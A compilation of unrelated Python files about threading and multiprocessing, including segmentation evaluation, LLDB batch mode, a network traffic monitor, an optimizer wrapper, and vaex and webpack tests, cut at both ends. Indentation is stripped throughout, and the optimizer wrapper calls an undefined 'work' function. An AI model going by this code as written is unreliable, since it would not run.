(_, predict) = cv2.threshold(predict, 0, 255, cv2.THRESH_BINARY)
#print(np.unique(predict), np.unique(gt))
predict = np.int32(predict/255.)
gt = np.int32(gt/255.)
cal = gt<255
mask = (predict==gt) * cal
for i in range(self.cfg.MODEL_NUM_CLASSES):
P[i].acquire()
P[i].value += np.sum((predict==i)*cal)
P[i].release()
T[i].acquire()
T[i].value += np.sum((gt==i)*cal)
T[i].release()
TP[i].acquire()
TP[i].value += np.sum((gt==i)*mask)
TP[i].release()
p_list = []
for i in range(15):
p = multiprocessing.Process(target=compare, args=(i,15,TP,P,T))
p.start()
p_list.append(p)
for p in p_list:
p.join()
IoU = []
for i in range(self.cfg.MODEL_NUM_CLASSES):
print(TP[i].value, T[i].value, P[i].value)
IoU.append(TP[i].value/(T[i].value+P[i].value-TP[i].value+1e-10))
for i in range(self.cfg.MODEL_NUM_CLASSES):
if i == 0:
print('%11s:%7.3f%%'%('backbound',IoU[i]*100),end='\t')
else:
if i%2 != 1:
print('%11s:%7.3f%%'%(self.categories[i-1],IoU[i]*100),end='\t')
else:
print('%11s:%7.3f%%'%(self.categories[i-1],IoU[i]*100))
miou = np.mean(np.array(IoU))
print('\n======================================================')
print('%11s:%7.3f%%'%('mIoU',miou*100)) '''
def do_python_eval(self, model_id):
IoU_array = 0.
sample_num = 0.
predict_folder = os.path.join(self.rst_dir,'%s_%s_cls'%(model_id,self.period))
gt_folder = self.seg_dir
TP = np.zeros((self.cfg.MODEL_NUM_CLASSES), np.uint64)
P = np.zeros((self.cfg.MODEL_NUM_CLASSES), np.uint64)
T = np.zeros((self.cfg.MODEL_NUM_CLASSES), np.uint64)
for idx in range(len(self.name_list)):
# print('%d/%d'%(idx,len(self.name_list)))
name_image = self.name_list[idx].split()[0]
name_seg = self.name_list[idx].split()[1]
predict_file = os.path.join(predict_folder,'%s'%name_image)
gt_file = os.path.join(gt_folder,'%s'%name_seg)
predict = np.array(Image.open(predict_file)) #cv2.imread(predict_file)
gt = np.array(Image.open(gt_file))
(_, predict) = cv2.threshold(predict, 0, 255, cv2.THRESH_BINARY)
predict = np.int32(predict/255.)
gt = np.int32(gt/255.)
cal = gt<255
mask = (predict==gt) * cal
#print(np.unique(predict), np.unique(gt), np.unique(cal), np.unique(mask))
for i in range(self.cfg.MODEL_NUM_CLASSES):
P[i] = np.sum((predict==i))
T[i] = np.sum((gt==i))
TP[i] = np.sum((gt==i)*mask)
TP = TP.astype(np.float64)
T = T.astype(np.float64)
P = P.astype(np.float64)
IoU = TP/(T+P-TP)
IoU_array += IoU
sample_num += 1
for i in range(self.cfg.MODEL_NUM_CLASSES):
if i == 0:
print('%15s:%7.3f%%'%('background',IoU_array[i]*100/sample_num))
else:
print('%15s:%7.3f%%'%(self.categories[i-1],IoU_array[i]*100/sample_num))
miou = np.mean(IoU_array/sample_num)
print('==================================')
print('%15s:%7.3f%%'%('mIoU',miou*100))
def __coco2voc(self, m):
r,c = m.shape
result = np.zeros((r,c),dtype=np.uint8)
for i in range(0,21):
for j in self.coco2voc[i]:
result[m==j] = i
return result
|
test_presence.py
|
"""Test the presence service."""
import time
from multiprocessing import Process
import pytest
from fm_server.presence import presence_service
@pytest.mark.usefixtures("database_base_seed")
def test_presence_start():
"""Test that the presence service starts."""
presence_controller = Process(target=presence_service)
presence_controller.start()
time.sleep(1)
presence_controller.terminate()
presence_controller.join()
# exitcode is the negative of the signal used to terminate
# the process. 15 is SIGTERM
assert presence_controller.exitcode == -15
|
lldb_batchmode.py
|
# Copyright 2014 The Rust Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution and at
# http://rust-lang.org/COPYRIGHT.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
# This script allows to use LLDB in a way similar to GDB's batch mode. That is, given a text file
# containing LLDB commands (one command per line), this script will execute the commands one after
# the other.
# LLDB also has the -s and -S commandline options which also execute a list of commands from a text
# file. However, this command are execute `immediately`: a the command of a `run` or `continue`
# command will be executed immediately after the `run` or `continue`, without waiting for the next
# breakpoint to be hit. This a command sequence like the following will not yield reliable results:
#
# break 11
# run
# print x
#
# Most of the time the `print` command will be executed while the program is still running will thus
# fail. Using this Python script, the above will work as expected.
from __future__ import print_function
try:
import _thread as thread # Python 3
except ImportError:
import thread # Python 2
import lldb
import os
import re
import sys
import threading
import time
# Set this to True for additional output
DEBUG_OUTPUT = False
def print_debug(s):
"""Print something if DEBUG_OUTPUT is True"""
global DEBUG_OUTPUT
if DEBUG_OUTPUT:
print("DEBUG: " + str(s))
def normalize_whitespace(s):
"""Replace newlines, tabs, multiple spaces, etc with exactly one space"""
return re.sub("\s+", " ", s)
def breakpoint_callback(frame, bp_loc, dict):
"""This callback is registered with every breakpoint and makes sure that the
frame containing the breakpoint location is selected"""
print("Hit breakpoint " + str(bp_loc))
# Select the frame and the thread containing it
frame.thread.process.SetSelectedThread(frame.thread)
frame.thread.SetSelectedFrame(frame.idx)
# Returning True means that we actually want to stop at this breakpoint
return True
# This is a list of breakpoints that are not registered with the breakpoint callback. The list is
# populated by the breakpoint listener and checked/emptied whenever a command has been executed
new_breakpoints = []
# This set contains all breakpoint ids that have already been registered with a callback, and is
# used to avoid hooking callbacks into breakpoints more than once
registered_breakpoints = set()
def execute_command(command_interpreter, command):
"""Executes a single CLI command"""
global new_breakpoints
global registered_breakpoints
res = lldb.SBCommandReturnObject()
print(command)
command_interpreter.HandleCommand(command, res)
if res.Succeeded():
if res.HasResult():
output = res.GetOutput() or ''
print(normalize_whitespace(output), end='\n')
# If the command introduced any breakpoints, make sure to register
# them with the breakpoint
# callback
while len(new_breakpoints) > 0:
res.Clear()
breakpoint_id = new_breakpoints.pop()
if breakpoint_id in registered_breakpoints:
print_debug("breakpoint with id %s is already registered. Ignoring." %
str(breakpoint_id))
else:
print_debug("registering breakpoint callback, id = " + str(breakpoint_id))
callback_command = ("breakpoint command add -F breakpoint_callback " +
str(breakpoint_id))
command_interpreter.HandleCommand(callback_command, res)
if res.Succeeded():
print_debug("successfully registered breakpoint callback, id = " +
str(breakpoint_id))
registered_breakpoints.add(breakpoint_id)
else:
print("Error while trying to register breakpoint callback, id = " +
str(breakpoint_id))
else:
print(res.GetError())
def start_breakpoint_listener(target):
"""Listens for breakpoints being added and adds new ones to the callback
registration list"""
listener = lldb.SBListener("breakpoint listener")
def listen():
event = lldb.SBEvent()
try:
while True:
if listener.WaitForEvent(120, event):
if lldb.SBBreakpoint.EventIsBreakpointEvent(event) and \
lldb.SBBreakpoint.GetBreakpointEventTypeFromEvent(event) == \
lldb.eBreakpointEventTypeAdded:
global new_breakpoints
breakpoint = lldb.SBBreakpoint.GetBreakpointFromEvent(event)
print_debug("breakpoint added, id = " + str(breakpoint.id))
new_breakpoints.append(breakpoint.id)
except:
print_debug("breakpoint listener shutting down")
# Start the listener and let it run as a daemon
listener_thread = threading.Thread(target=listen)
listener_thread.daemon = True
listener_thread.start()
# Register the listener with the target
target.GetBroadcaster().AddListener(listener, lldb.SBTarget.eBroadcastBitBreakpointChanged)
def start_watchdog():
"""Starts a watchdog thread that will terminate the process after a certain
period of time"""
try:
from time import clock
except ImportError:
from time import perf_counter as clock
watchdog_start_time = clock()
watchdog_max_time = watchdog_start_time + 30
def watchdog():
while clock() < watchdog_max_time:
time.sleep(1)
print("TIMEOUT: lldb_batchmode.py has been running for too long. Aborting!")
thread.interrupt_main()
# Start the listener and let it run as a daemon
watchdog_thread = threading.Thread(target=watchdog)
watchdog_thread.daemon = True
watchdog_thread.start()
####################################################################################################
# ~main
####################################################################################################
if len(sys.argv) != 3:
print("usage: python lldb_batchmode.py target-path script-path")
sys.exit(1)
target_path = sys.argv[1]
script_path = sys.argv[2]
print("LLDB batch-mode script")
print("----------------------")
print("Debugger commands script is '%s'." % script_path)
print("Target executable is '%s'." % target_path)
print("Current working directory is '%s'" % os.getcwd())
# Start the timeout watchdog
start_watchdog()
# Create a new debugger instance
debugger = lldb.SBDebugger.Create()
# When we step or continue, don't return from the function until the process
# stops. We do this by setting the async mode to false.
debugger.SetAsync(False)
# Create a target from a file and arch
print("Creating a target for '%s'" % target_path)
target_error = lldb.SBError()
target = debugger.CreateTarget(target_path, None, None, True, target_error)
if not target:
print("Could not create debugging target '" + target_path + "': " +
str(target_error) + ". Aborting.", file=sys.stderr)
sys.exit(1)
# Register the breakpoint callback for every breakpoint
start_breakpoint_listener(target)
command_interpreter = debugger.GetCommandInterpreter()
try:
script_file = open(script_path, 'r')
for line in script_file:
command = line.strip()
if command == "run" or command == "r" or re.match("^process\s+launch.*", command):
# Before starting to run the program, let the thread sleep a bit, so all
# breakpoint added events can be processed
time.sleep(0.5)
if command != '':
execute_command(command_interpreter, command)
except IOError as e:
print("Could not read debugging script '%s'." % script_path, file=sys.stderr)
print(e, file=sys.stderr)
print("Aborting.", file=sys.stderr)
sys.exit(1)
finally:
debugger.Terminate()
script_file.close()
|
TrafficMonitor.py
|
import threading
import logging
import time
import datetime
from src.utils.utils import merge_dict, FlowKey, FlowPkt
from src.Classifier import DomainClassifier
from src.utils.utils import get_mac, get_device_name, get_vendor_from_mac, disable_if_offline, IP_is_private
from src.utils.utils import StopProgramException, restart_on_error
class TrafficMonitor:
"""
This class implements the traffic monitor
It receives data from the packet parser and keeps track of traffic features by updating its local data
"""
def __init__(self, host_state, update_delay):
self.host_state = host_state
self.updater_thread = threading.Thread(target=self.safe_updater)
self.updater_thread.daemon = True
self.lock = threading.Lock()
self.active = True
self.update_delay = update_delay
self.device_names = {} # MAC -> name
self.queried_domains = {}
self.blocked_domains = set()
self.passive_DNS = {}
self.arp_table = {}
self.flows = {}
self.domain_scores = {}
self.classifier = None
self.last_timestamp = 0
self.first_timestamp = 0
self.new_data = False #turns to true, if new data comes
self.STOP_AFTER_WITH_NO_INFO = self.host_state.config.get_config("STOP_AFTER_WITH_NO_INFO")
def start(self):
if self.classifier is None:
logging.info("[TrafficMonitor] Initialising classifier")
self.classifier = DomainClassifier()
with self.lock:
self.active = True
logging.info("[Monitor] Traffic monitor starting")
self.updater_thread.start()
def stop(self):
self.active = False
if self.host_state.online:
self.classifier.delete_file()
self.updater_thread.join()
logging.info("[Monitor] Traffic monitor stopping")
def new_device_get_mac(self, ip, mac=""):
# obtain mac of IP
if ip not in self.arp_table:
if mac == "":
if self.host_state.online:
mac = get_mac(ip)
if mac is None or mac == "":
# return and do not add this empty mac to the ARP table
return ""
logging.info("[Monitor] New device: IP=%s, MAC=%s", ip, mac)
self.arp_table[ip] = mac
else:
mac = self.arp_table[ip]
return mac
def new_device_get_name(self, ip, mac):
#obtain device name
if mac != "" and mac not in self.device_names:
if self.host_state.online:
name = get_device_name(ip, self.host_state.gateway_ip)
else:
name = "-"
manufacturer = get_vendor_from_mac(mac)
self.device_names[mac] = (name, manufacturer)
# active discovery function, so disabled when offline
def new_device(self, ip, mac=""):
"""Gathers info and adds the device to ARP table and device names"""
if IP_is_private(ip) and ip != "0.0.0.0":
mac = self.new_device_get_mac(ip, mac)
self.new_device_get_name(ip, mac)
self.new_data = True
if not self.host_state.online:
self.host_state.add_to_victim_list(ip)
def sleep(self, seconds):
"""Sleep for given seconds, but check if still active every second"""
for _ in range(seconds):
if not self.active:
break
time.sleep(1)
def updater(self):
while self.active:
if self.new_data:
for ip in self.arp_table.copy():
self.new_device(ip)
with self.host_state.lock:
# update passive DNS: for each domain add the new IPs (the IP list is a set)
for domain in self.passive_DNS:
self.host_state.passive_DNS.setdefault(domain, set()).update(self.passive_DNS[domain])
# update queried domains
# do not use copy(), simply add the new data
for ip in self.queried_domains.copy():
if ip not in self.host_state.queried_domains:
self.host_state.queried_domains[ip] = []
new_tuples = []
for t in reversed(self.queried_domains[ip]):
if t not in self.host_state.queried_domains[ip]:
new_tuples.append(t)
else:
break
# reverse data to keep chronological order in queried domains
new_data = new_tuples[::-1]
self.host_state.queried_domains[ip] += new_data
# update ARP table
new_ARP = merge_dict(self.host_state.arp_table, self.arp_table)
self.host_state.arp_table = new_ARP.copy()
#update device names
self.host_state.device_names = self.device_names.copy()
#update the list of blocked domains
self.host_state.blocked_domains.update(self.blocked_domains)
# update the list of flows
for flow_key in self.flows.copy():
if flow_key not in self.host_state.flows:
self.host_state.flows[flow_key] = []
self.host_state.flows[flow_key] += self.flows[flow_key]
self.flows = {}
self.host_state.domain_scores = self.domain_scores
self.host_state.last_update = time.time()
self.host_state.last_timestamp = self.last_timestamp
self.new_data = False
last_t = datetime.datetime.fromtimestamp(self.host_state.last_timestamp).strftime('%H:%M:%S')
logging.info("[Monitor] Updated data to host thread, last-t: %s", last_t)
# end of lock
# wait until next iteration,
# split waiting time into small waits to check if process is still active
else:
logging.debug("[Monitor] No new data (source: %s)", self.host_state.capture_file.split("/")[-1])
if not self.host_state.online and time.time() - self.host_state.last_update > self.STOP_AFTER_WITH_NO_INFO:
print("[TrafficMonitor] ===== Stopping because no data has been received since {}s".format(self.STOP_AFTER_WITH_NO_INFO))
self.host_state.active = False
self.sleep(self.update_delay)
def safe_updater(self):
restart_on_error(self.updater)
def score_domain(self, domain):
X = self.classifier.compute_features(domain)
# score is computed from proba of being malicious (ie class = 1)
score = 10 * self.classifier.classifier.predict_proba(X)[0][1]
return score
def add_to_pDNS(self, domain_name, ip_list):
"""Called by the packet_parser when a new domain appears in a DNS response
Adds the domain to the pDNS database (note that the responses may be spoofed, so some IPs will not be contacted)
"""
# add to pDNS database
if domain_name not in self.passive_DNS:
self.passive_DNS[domain_name] = set(ip_list)
# new domain: compute its score
score = self.score_domain(domain_name)
self.domain_scores[domain_name] = round(score,2)
else:
self.passive_DNS[domain_name].update(ip_list)
self.new_data = True
def add_to_queried_domains(self, ip, fqdn, timestamp):
self.queried_domains.setdefault(ip, []).append((timestamp, fqdn))
self.last_timestamp = timestamp
self.new_data = True
def add_to_blocked_domains(self, domain_name):
"""adds a domain to the list of domains that have been spoofed"""
if domain_name not in self.blocked_domains:
self.blocked_domains.add(domain_name)
self.new_data = True
def add_to_ARP_table(self, ip, mac):
"""adds an entry to the ARP table of the host state"""
if ip != "0.0.0.0":
self.arp_table[ip] = mac
self.new_device_get_name(ip, mac)
self.new_data = True
def add_to_flow(self, flow_key:FlowKey, pkt_att:FlowPkt):
"""Adds an entry to flow based on information received from the packet parser"""
self.flows.setdefault(flow_key, []).append(pkt_att)
self.last_timestamp = pkt_att.timestamp
d = datetime.datetime.fromtimestamp(self.last_timestamp)
logging.info("Added to flow, packet at %s", d.strftime("%H:%M:%S"))
self.new_data = True
|
ext_openbox_mfes.py
|
import time
import numpy as np
from ext_algs.base import Ext_opt
from xbbo.core.trials import Trial, Trials
import ConfigSpace
from ConfigSpace import Configuration
from xbbo.utils.constants import Key
import sys
from multiprocessing import Process
sys.path.append('../open-box')
from openbox.apps.multi_fidelity.mq_mfes import mqMFES
from openbox.apps.multi_fidelity.mq_mf_worker import mqmfWorker
# logging.basicConfig(level=logging.ERROR)
class Float(float):
regret_test = None
class HB_opt(Ext_opt):
def __init__(self,
cs: ConfigSpace,
objective_function=None,
budget_bound=[0, np.inf],
seed=0,
**kwargs) -> None:
super().__init__(cs,
objective_function,
budget_bound=budget_bound,
seed=seed)
np.random.seed(self.seed)
self.port = kwargs.get("port", 13577)
self.cs = cs
self.trials = Trials(cs,len(cs.get_hyperparameter_names()))
new_max_budget = self.max_budget / self.min_budget
new_min_budget = 1
old_min_budget = self.min_budget
def obj(config, n_resource, extra_conf):
budget = n_resource * old_min_budget
res = objective_function(config, budget=budget, **kwargs)
# config = Configuration(cs, dic)
# res = {
# Key.FUNC_VALUE:res[Key.FUNC_VALUE], # minimize
# Key.COST: res.get(Key.COST, n_resource),
# "info": {
# Key.REGRET_TEST: res.get(Key.REGRET_TEST, 0),
# Key.BUDGET: n_resource
# }}
# trials.append(Trial(config,
# config.get_dictionary(),
# observe_value=res[Key.FUNC_VALUE],
# info={
# Key.REGRET_TEST: res["info"][Key.REGRET_TEST],
# Key.REGRET_VAL: res[Key.FUNC_VALUE],
# Key.COST: res[Key.COST]
# }))
obs = Float(res[Key.FUNC_VALUE])
obs.regret_test = res.get(Key.REGRET_TEST, 0)
result = {
"objective_value":obs,
}
return result
# def work():
# worker = mqmfWorker(obj, '127.0.0.1', self.port, authkey=b'abc')
# worker.run()
self._inner_opt = mqMFES(
None, cs, new_max_budget, eta=kwargs.get("eta", 3),
num_iter=kwargs.get('round_limit', 50), random_state=seed,
method_id='-', restart_needed=True,
time_limit_per_trial=999999,
runtime_limit=np.inf,
ip='127.0.0.1', port=self.port, authkey=b'abc'
)
self._inner_opt.iterate_r = (self._inner_opt.R * self._inner_opt.eta ** -np.linspace(
start=self._inner_opt.s_max, stop=0, num=self._inner_opt.s_max+1)).astype('int').tolist()
self._inner_opt.target_x = {k:[] for k in self._inner_opt.iterate_r}
self._inner_opt.target_y = {k:[] for k in self._inner_opt.iterate_r}
map_old = self._inner_opt.weighted_surrogate.surrogate_r.copy()
self._inner_opt.weighted_surrogate.surrogate_r = self._inner_opt.iterate_r.copy()
self._inner_opt.weighted_surrogate.surrogate_container = {self._inner_opt.weighted_surrogate.surrogate_r[i]:self._inner_opt.weighted_surrogate.surrogate_container[map_old[i]] for i in range(len(map_old))}
self._inner_opt.weighted_surrogate.surrogate_weight = {self._inner_opt.weighted_surrogate.surrogate_r[i]:self._inner_opt.weighted_surrogate.surrogate_weight[map_old[i]] for i in range(len(map_old))}
self.p=Process(target=work, args=())
self.p.start()
self.kwargs = kwargs
def _optimize(self):
self._inner_opt.run()
self.p.terminate()
self._calc_trials(self._inner_opt.recorder)
self._inner_opt.master_messager.workerQueue._manager.shutdown()
self.p.join()
self._inner_opt.master_messager.workerQueue._manager.join()
# time.sleep(10)
return self.trials
def _calc_trials(self, data):
# valid_regret = []
# test_regret = []
# costs = []
for obs in data:
r_info = obs["return_info"]
curr_regret = r_info["loss"]
config = obs["configuration"]
dic = config.get_dictionary()
curr_test_regret = curr_regret.regret_test
self.trials.add_a_trial(
Trial(config,
dic,
observe_value=curr_regret,
info={
Key.REGRET_TEST: curr_test_regret,
Key.REGRET_VAL: curr_regret,
Key.COST: r_info["n_iteration"] * self.min_budget
}), permit_duplicate=True)
opt_class = HB_opt
|
foo.py
|
# Python 3.3.3 and 2.7.6
# python fo.py
from threading import Thread
# Potentially useful thing:
# In Python you "import" a global variable, instead of "export"ing it when you declare it
# (This is probably an effort to make you feel bad about typing the word "global")
i = 0
def incrementingFunction():
global i
# TODO: increment i 1_000_000 times
for j in range(1000000):
i+=1
def decrementingFunction():
global i
# TODO: decrement i 1_000_000 times
for j in range(1000000):
i-=1
def main():
# TODO: Something is missing here (needed to print i)
incrementing = Thread(target = incrementingFunction, args = (),)
decrementing = Thread(target = decrementingFunction, args = (),)
# TODO: Start both threads
incrementing.start()
decrementing.start()
incrementing.join()
decrementing.join()
print("The magic number is %d" % (i))
main()
|
execution_test.py
|
from unittest.mock import MagicMock
from concurrent.futures import ThreadPoolExecutor
import concurrent.futures
import platform
import threading
import pytest
import numpy as np
from common import small_buffer
import vaex
def test_evaluate_expression_once():
calls = 0
def add(a, b):
nonlocal calls
if len(a) > 1: # skip dtype calls
calls += 1
return a + b
x = np.arange(5)
y = x**2
df = vaex.from_arrays(x=x, y=y)
df.add_function('add', add)
df['z'] = df.func.add(df.x, df.y)
df.executor.passes = 0
df.z.sum(delay=True)
df._set('z', delay=True)
calls = 0
df.execute()
assert df.executor.passes == 1
assert calls == 1
def test_nested_use_of_executor():
df = vaex.from_scalars(x=1, y=2)
@vaex.delayed
def next(x):
# although the exector is still in its look, it's not using the threads anymore
# so we should be able to use the executor again
return x + df.y.sum()
value = next(df.x.sum(delay=True))
df.execute()
assert value.get() == 1 + 2
def test_passes_two_datasets():
df1 = vaex.from_scalars(x=1, y=2)
df2 = vaex.from_scalars(x=1, y=3)
executor = df1.executor
executor.passes = 0
df1.sum('x')
assert executor.passes == 1
df1.sum('x', delay=True)
df2.sum('x', delay=True)
df1.execute()
assert executor.passes == 3
def test_passes_two_datasets_different_vars():
x = np.array([2.])
y = x**2
dataset = vaex.dataset.DatasetArrays(x=x, y=y)
df1 = vaex.from_dataset(dataset)
df2 = vaex.from_dataset(dataset)
df1.variables['a'] = 1
df2.variables['a'] = 2
df1['z'] = 'x + y * a'
df2['z'] = 'x + y * a'
executor = df1.executor
executor.passes = 0
s1 = df1.sum('z', delay=True)
s2 = df2.sum('z', delay=True)
df1.execute()
assert executor.passes == 1
assert s1.get() == 2 + 4 * 1
assert s2.get() == 2 + 4 * 2
def test_passes_two_datasets_different_expressions():
x = np.array([2.])
y = x**2
dataset = vaex.dataset.DatasetArrays(x=x, y=y)
df1 = vaex.from_dataset(dataset)
df2 = vaex.from_dataset(dataset)
df1['a'] = 'x * y'
df2['b'] = 'x + y'
executor = df1.executor
executor.passes = 0
s1 = df1.sum('a', delay=True)
s2 = df2.sum('b', delay=True)
df1.execute()
assert executor.passes == 1
assert s1.get() == 2 * 4
assert s2.get() == 2 + 4
def test_passes_filtering():
x = np.arange(10)
df = vaex.from_arrays(x=x, y=x**2)
df1 = df[df.x < 4]
df2 = df[df.x > 7]
executor = df.executor
executor.passes = 0
result1 = df1.sum('x', delay=True)
result2 = df2.sum('x', delay=True)
df.execute()
assert executor.passes == 1
assert result1.get() == 1 + 2 + 3
assert result2.get() == 8 + 9
def test_passes_mixed_filtering():
x = np.arange(10)
df = vaex.from_arrays(x=x, y=x**2)
df1 = df[df.x < 4]
df2 = df
executor = df.executor
executor.passes = 0
result1 = df1.sum('x', delay=True)
result2 = df2.sum('x', delay=True)
df.execute()
assert executor.passes == 1
assert result1.get() == 1 + 2 + 3
assert result2.get() == 45
def test_multiple_tasks_different_columns_names():
df1 = vaex.from_scalars(x=1, y=2)
df2 = vaex.from_scalars(x=1, y=2)
x = df1.sum('x', delay=True)
y = df2.sum('y', delay=True)
df1.execute()
assert x.get() == 1
assert y.get() == 2
def test_merge_aggregation_tasks():
df = vaex.from_arrays(x=[1, 2], y=[2, 3])
binners = df._create_binners('x', [0.5, 2.5], 2)
binners2 = df._create_binners('x', [0.5, 2.5], 2)
assert len(binners) == 1
vaex.agg.count().add_tasks(df, binners, progress=False)
assert len(df.executor.tasks) == 1
assert binners is not binners2
assert binners[0] is not binners2[0]
assert binners == binners2
assert binners[0] == binners2[0]
vaex.agg.sum('y').add_tasks(df, binners, progress=False)
assert len(df.executor.tasks) == 2
tasks = df.executor._pop_tasks()
assert len(tasks) == 2
tasks = vaex.execution._merge_tasks_for_df(tasks, df)
assert len(tasks) == 1
assert isinstance(tasks[0], vaex.tasks.TaskAggregations)
def test_merge_same_aggregation_tasks():
df = vaex.from_arrays(x=[1, 2], y=[2, 3])
binners = df._create_binners('x', [0.5, 2.5], 2)
binners2 = df._create_binners('x', [0.5, 2.5], 2)
assert len(binners) == 1
# these two aggregations should be merged into 1 subtask
[task1], result1 = vaex.agg.count().add_tasks(df, binners, progress=False)
[task2], result2 = vaex.agg.count().add_tasks(df, binners, progress=False)
assert len(df.executor.tasks) == 1
df.execute()
assert task1 is task2
assert np.all(result1.get() == result2.get())
def test_signals(df):
x = np.arange(10)
y = x**2
sum_x_expected = x.sum()
sum_y_expected = y.sum()
with vaex.cache.off():
mock_begin = MagicMock()
mock_progress = MagicMock()
mock_end = MagicMock()
len(df) # ensure we have the filter precomputed
df.executor.signal_begin.connect(mock_begin)
df.executor.signal_progress.connect(mock_progress)
df.executor.signal_end.connect(mock_end)
sum_x = df.sum(df.x, delay=True)
sum_y = df.sum(df.y, delay=True)
df.execute()
assert sum_x.get() == sum_x_expected
assert sum_y.get() == sum_y_expected
mock_begin.assert_called_once()
mock_progress.assert_called_with(1.0)
mock_end.assert_called_once()
def test_reentrant_catch(df_local):
with vaex.cache.off():
df = df_local
# a 'worker' thread should not be allowed to trigger a new computation
def progress(fraction):
print('progress', fraction)
df.count(df.x) # enters the executor again
with pytest.raises(RuntimeError) as exc:
df.count(df.x, progress=progress)
assert 'nested' in str(exc.value)
@pytest.mark.skipif(platform.system().lower() == 'windows', reason="hangs appveyor very often, bug?")
def test_thread_safe(df_local):
with vaex.cache.off():
df = df_local
# but an executor should be thread save
def do():
return df_local.count(df.x) # enters the executor from a thread
count = df_local.count(df.x)
tpe = ThreadPoolExecutor(4)
futures = []
passes = df.executor.passes
N = 100
with small_buffer(df):
for i in range(N):
futures.append(tpe.submit(do))
done, not_done = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_EXCEPTION)
for future in done:
assert count == future.result()
assert df.executor.passes <= passes + N
def test_delayed(df):
with vaex.cache.off():
@vaex.delayed
def add(a, b):
return a + b
total_promise = add(df.sum(df.x, delay=True), 1)
df.execute()
assert total_promise.get() == df.sum(df.x) + 1
def test_nested_task(df):
with vaex.cache.off():
@vaex.delayed
def add(a, b):
return a + b
total_promise = add(df.sum(df.x, delay=True))
@vaex.delayed
def next(value):
# during the handling of the sum task, we add a new task
sumy_promise = df.sum(df.y, delay=True)
if df.is_local():
assert not df.executor.local.executing
# without callling the exector, since it should still be running its main loop
return add(sumy_promise, value)
total_promise = next(df.sum(df.x, delay=True))
df.execute()
assert total_promise.get() == df.sum(df.x) + df.sum(df.y)
def test_executor_from_other_thread():
with vaex.cache.off():
df = vaex.from_arrays(x=[1, 2])
def execute():
# but call execute from a different thread
df.execute()
# we add a tasks from the main thread, we use binby without limits to force
# a double computation.
c = df.count('x', binby='x', delay=True, edges=True)
thread = threading.Thread(target=execute)
thread.start()
thread.join()
assert sum(c.get()) == 2
def test_cancel_single_job():
df = vaex.from_arrays(x=[1, 2, 3])
res1 = df._set(df.x, unique_limit=1, delay=True)
res2 = df._set(df.x, delay=True)
df.execute()
assert res1.isRejected
assert res2.isFulfilled
def test_exception():
df = vaex.from_arrays(x=[1, 2, 3])
with pytest.raises(vaex.RowLimitException, match='.* >= 1 .*'):
df._set(df.x, unique_limit=1)
# def test_add_and_cancel_tasks(df_executor):
# df = df_executor
# def add_task_and_cancel(fraction):
# df.sum(df.x, delay=True)
# return False
# future = df.count(progress=add_task_and_cancel, delay=True)
# df.execute()
# with pytest.raises(vaex.execution.UserAbort):
# future.get()
# assert df.executor.tasks
# import vaex
# import vaex.dask
# import vaex.ray
# import numpy as np
# @pytest.fixture(params=['executor_dask', 'executor_ray'])
# def executor(request, executor_dask, executor_ray):
# named = dict(executor_dask=executor_dask, executor_ray=executor_ray)
# return named[request.param]
# @pytest.fixture(scope='session')
# def executor_ray():
# return vaex.ray.Executor(chunk_size=2)
# @pytest.fixture(scope='session')
# def executor_dask():
# return vaex.dask.Executor(chunk_size=2)
# @pytest.fixture
# def df():
# x = np.arange(10)
# y = x**2
# df = vaex.from_arrays(x=x, y=y)
# return df
# def test_task_sum(df, executor):
# total = df.x.sum()
# task = vaex.tasks.TaskSum(df, 'x')
# # df.executor = None
# # df._expressions = None
# # executor = vaex.ray.ExecutorRay()
# executor.schedule(task)
# executor.execute()
# assert task.result == total
# def test_sum(df, executor):
# total = df.x.sum()
# df.executor = executor
# total2 = df.x.sum()
# assert total == total2
|
__init__.py
|
""" Tests for pyramid_webpack """
import os
import inspect
import re
import json
import shutil
import tempfile
import webtest
from mock import MagicMock
from pyramid.config import Configurator
from pyramid.renderers import render_to_response
from six.moves.queue import Queue, Empty # pylint: disable=E0401
from threading import Thread
from pyramid_webpack import WebpackState, Webpack, StaticResource
try:
import unittest2 as unittest # pylint: disable=E0401
except ImportError:
import unittest
def load_stats(state, queue, *args, **kwargs):
""" Load stats and put it into a queue """
# Put a sentinel in the queue when the thread starts
queue.put(object())
stats = state.load_stats(*args, **kwargs)
queue.put(stats)
def run_load_stats(state, *args, **kwargs):
""" Run load_stats() in a thread """
queue = Queue()
thread_args = [state, queue]
thread_args.extend(args)
thread = Thread(target=load_stats, args=thread_args, kwargs=kwargs)
thread.daemon = True
thread.start()
# Wait until the thread is definitely started
queue.get(True)
return queue
class TempDirTest(unittest.TestCase):
""" Test class that provides filesystem helpers """
def setUp(self):
super(TempDirTest, self).setUp()
self._tempdir = tempfile.mkdtemp()
def tearDown(self):
super(TempDirTest, self).tearDown()
shutil.rmtree(self._tempdir)
def _write(self, filename, data):
""" Write json data to a file """
fullpath = os.path.join(self._tempdir, filename)
with open(fullpath, 'w') as ofile:
json.dump(data, ofile)
return fullpath
class TestWebpackState(TempDirTest):
""" Tests for the WebpackState """
def test_load_stats(self):
""" State loads stats from a json file """
data = {'a': 'b'}
stats_file = self._write('stats.json', data)
settings = {
'webpack.stats_file': stats_file,
}
state = WebpackState(settings)
stats = state.load_stats()
self.assertEqual(stats, data)
def test_load_stats_as_asset(self):
"""
State loads stats from a json file specified in a:b/c.json notation
Tests the regression where loading the stats file specified in the
notation didn't work for Python 3 (before 3.6).
"""
settings = {
'webpack.stats_file': 'tests:test-stats.json',
}
state = WebpackState(settings)
stats = state.load_stats()
self.assertEqual(stats, {'a': 'b'})
def test_missing_stats(self):
""" raise IOError if stats file is missing """
state = WebpackState({})
with self.assertRaises(IOError):
state.load_stats()
def test_cache_stats(self):
""" When cache=True, cache the stats file """
data = {'a': 'b'}
stats_file = self._write('stats.json', data)
settings = {
'webpack.stats_file': stats_file,
}
state = WebpackState(settings)
stats = state.load_stats(cache=True)
self.assertEqual(data, stats)
with open(stats_file, 'w') as ofile:
json.dump({'b': 'c'}, ofile)
second_stats = state.load_stats(cache=True)
self.assertEqual(second_stats, stats)
def test_no_cache_stats(self):
""" When cache=False, don't cache the stats file """
stats_file = self._write('stats.json', {'a': 'b'})
settings = {
'webpack.stats_file': stats_file,
}
